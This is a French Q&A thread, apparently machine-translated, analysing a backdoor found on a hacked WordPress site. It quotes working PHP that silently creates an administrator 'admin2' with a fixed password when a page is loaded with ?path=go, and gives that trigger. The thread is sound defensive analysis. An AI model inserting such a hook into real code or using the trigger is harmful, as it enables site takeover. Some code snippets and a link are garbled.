En trouvant du code malveillant dans un site WordPress piraté, j'ai trouvé le code suivant
'34d1f91fb2e514b8576fab1a75a89a6b'
Que fait ce code?
if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' )
Et qu'est-ce que cela signifie?
add_action( 'wp_head', 'my_path' ); function my_path() { if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'admin2' ) ) { $user_id = wp_create_user( 'admin2', 'pass!path' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }
Merci d'avance.
3 Réponses :
Cela va simplement convertir $ _GET ['path']
en md5 qui est utilisé pour le cryptage et comparera la valeur cryptée avec 34d1f91fb2e514b8576fab1a75a89a6b
Vous pouvez obtenir plus d'informations ici sur site php https://www.php.net/manual/en/function. md5.php
Merci beaucoup. Existe-t-il un moyen de savoir ce que signifie réellement "34d1f91fb2e514b8576fab1a75a89a6b". Pour que je puisse trouver le code / fichier qui a été ajouté à mon site.
@BenJonson echo md5 ('go')
affichera 34d1f91fb2e514b8576fab1a75a89a6b
Il vérifie si le paramètre de chaîne de requête path
est égal à go a> et crée un utilisateur nommé admin2
, si c'est le cas. Le code pourrait se résumer à cet ancien élément essentiel sur github.com .
Ce
if ( $_GET['path'] == 'go' )
calcule la somme de contrôle MD5 de la chaîne _GET ['path']
et la compare avec une autre chaîne (la chaîne hexadécimale). Il peut être remplacé par
if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' )
... car la somme de contrôle MD5 de 'go'
est '34d1f91fb2e514b8576fab1a75a89a6b'
.
La sémantique ne change qu'en 1 point: l'original correspond à d'autres chaînes avec la même somme de contrôle MD5, mais le remplacement ne change pas.
Jetez un coup d'œil à md5.gromweb.com/?md5=34d1f91fb2e514a8a85b76b8576ab)
si
yoururl.tld? path = go
créez un nouveau compte administrateur, nom d'utilisateur admin2.Si vous google
wordpress 34d1f91fb2e514b8576fab1a75a89a6b
, vous obtenez quelques exemples sur "comment créer une porte dérobée wordpress".